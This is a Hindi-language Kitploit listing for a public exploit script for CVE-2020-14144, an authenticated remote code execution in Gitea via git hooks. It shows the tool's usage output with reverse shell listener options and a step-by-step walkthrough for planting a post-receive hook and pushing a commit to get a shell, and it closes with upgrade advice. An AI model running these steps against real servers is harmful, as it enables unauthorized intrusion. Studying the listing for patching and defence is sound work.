Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-14144-GiTea-git-hooks-rce — CVE-2020-14144 का शोषण करने के लिए एक स्क्रिप्ट - GiTea प्रमाणित रिमोट कोड निष्पादन git हुक का उपयोग करते हुए | Kitploit
उपकरण/GitHubGitHub/p0dalirius/cve-2020-14144-gitea-git-hooks-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubp0dalirius/cve-2020-14144-gitea-git-hooks-rce

CVE-2020-14144-GiTea-git-hooks-rce

CVE-2020-14144 का शोषण करने के लिए एक स्क्रिप्ट - GiTea प्रमाणित रिमोट कोड निष्पादन git हुक का उपयोग करते हुए

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखेंवेबसाइट
3275 महीने पहलेKitploit द्वारा समीक्षित

CVE-2020-14144 - GiTea प्रमाणित RCE

git हुक्स का उपयोग करके CVE-2020-14144 - GiTea प्रमाणित रिमोट कोड निष्पादन का शोषण करने के लिए एक स्क्रिप्ट
GitHub release (latest by date) YouTube Channel Subscribers

विशेषताएँ

  • IP और PORT से स्वचालित रिवर्स शेल पेलोड जनरेशन
  • कस्टम शेल स्क्रिप्ट अपलोड करें और -f विकल्प के साथ इसे दूरस्थ रूप से निष्पादित करें
  • उपयोगकर्ता नाम और पासवर्ड के साथ स्वचालित लॉगिन

उपयोग

root@kitploit:~
$ ./CVE-2020-14144-GiTea-git-hooks-rce.py -h
    _____ _ _______
   / ____(_)__   __|             CVE-2020-14144
  | |  __ _   | | ___  __ _
  | | |_ | |  | |/ _ \/ _` |     Authenticated Remote Code Execution
  | |__| | |  | |  __/ (_| |
   \_____|_|  |_|\___|\__,_|     GiTea versions >= 1.1.0 to <= 1.12.5
     
usage: CVE-2020-14144-GiTea-git-hooks-rce.py [-h] [-v] -t TARGET -u USERNAME -p PASSWORD [-I REV_IP] [-P REV_PORT] [-f PAYLOAD_FILE]

CVE-2020-14144 - GiTea authenticated Remote Code Execution using git hooks

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose         Increase verbosity.
  -t TARGET, --target TARGET
                        Target host (http://..., https://... or domain name)
  -u USERNAME, --username USERNAME
                        GiTea username
  -p PASSWORD, --password PASSWORD
                        GiTea password
  -I REV_IP, --rev-ip REV_IP
                        Reverse shell listener IP
  -P REV_PORT, --rev-port REV_PORT
                        Reverse shell listener port
  -f PAYLOAD_FILE, --payload-file PAYLOAD_FILE
                        Path to shell script payload to use.

प्रदर्शन

इस कमजोरी/सुविधा का सफलतापूर्वक शोषण करने के लिए, लक्ष्य सर्वर GiTea संस्करण 1.1.0 और संस्करण 1.13 के बीच होना चाहिए, और आपको "गिट हुक्स बना सकते हैं" अधिकार सक्रिय वाला एक वैध खाता (उपयोगकर्ता नाम, पासवर्ड) चाहिए।

"गिट हुक्स बना सकते हैं" अधिकार सक्रिय वाला खाता

सिस्टम प्रशासन के दृष्टिकोण से, शोषण से पहले gitea प्रक्रिया इस प्रकार दिखती है:

शोषण से पहले सेवा स्थिति

सबसे पहले, हमें अपने खाते का उपयोग करके GiTea वेब इंटरफ़ेस पर एक रिपॉजिटरी बनानी होगी। हम रिपॉजिटरी बनाते हैं और Settings -> Git Hooks -> Post Receive Hook में जाते हैं। इस हुक में आप एक शेल स्क्रिप्ट लिख सकते हैं जो नई कमिट प्राप्त करने के बाद निष्पादित की जाएगी।

Post Receive Hook

अब हम अपनी हमलावर मशीन पर एक अस्थायी निर्देशिका बनाएंगे, और दूरस्थ रिपॉजिटरी में push करेंगे। यह Post Receive Hook स्क्रिप्ट को ट्रिगर करेगा।

root@kitploit:~
touch README.md
git init
git add README.md
git commit -m "Initial commit"
git remote add origin https://vulnserver/testuser/vuln.git
git push -u origin master

जब हम कमिट को दूरस्थ रिपॉजिटरी में push कर देते हैं, तो यह Post Receive Hook स्क्रिप्ट को ट्रिगर करेगा और हमारे पास एक रिवर्स शेल होगा !

रिवर्स शेल

शोषण के बाद, एक सिस्टम प्रशासक GiTea की चाइल्ड प्रक्रियाओं में हमारा अलग किया गया रिवर्स शेल आसानी से देख सकता है:

शोषण के बाद सेवा स्थिति

शमन उपाय

कम से कम संस्करण 1.13.0 में अपडेट करने की अनुशंसा की जाती है।

अतिरिक्त संदर्भ

  • https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
  • https://nvd.nist.gov/vuln/detail/CVE-2020-14144
  • https://www.fzi.de/en/news/news/detail-en/artikel/fsa-2020-3-schwachstelle-in-gitea-1125-und-gogs-0122-ermoeglicht-ausfuehrung-von-code-nach-authent/
  • https://docs.gitlab.com/ee/administration/server_hooks.html
  • https://github.com/go-gitea/gitea
  • https://github.com/go-gitea/gitea/pull/13058

योगदान

Pull requests का स्वागत है। यदि आप अन्य सुविधाएँ जोड़ना चाहते हैं तो बेझिझक एक issue खोलें।

टूल डाउनलोड करें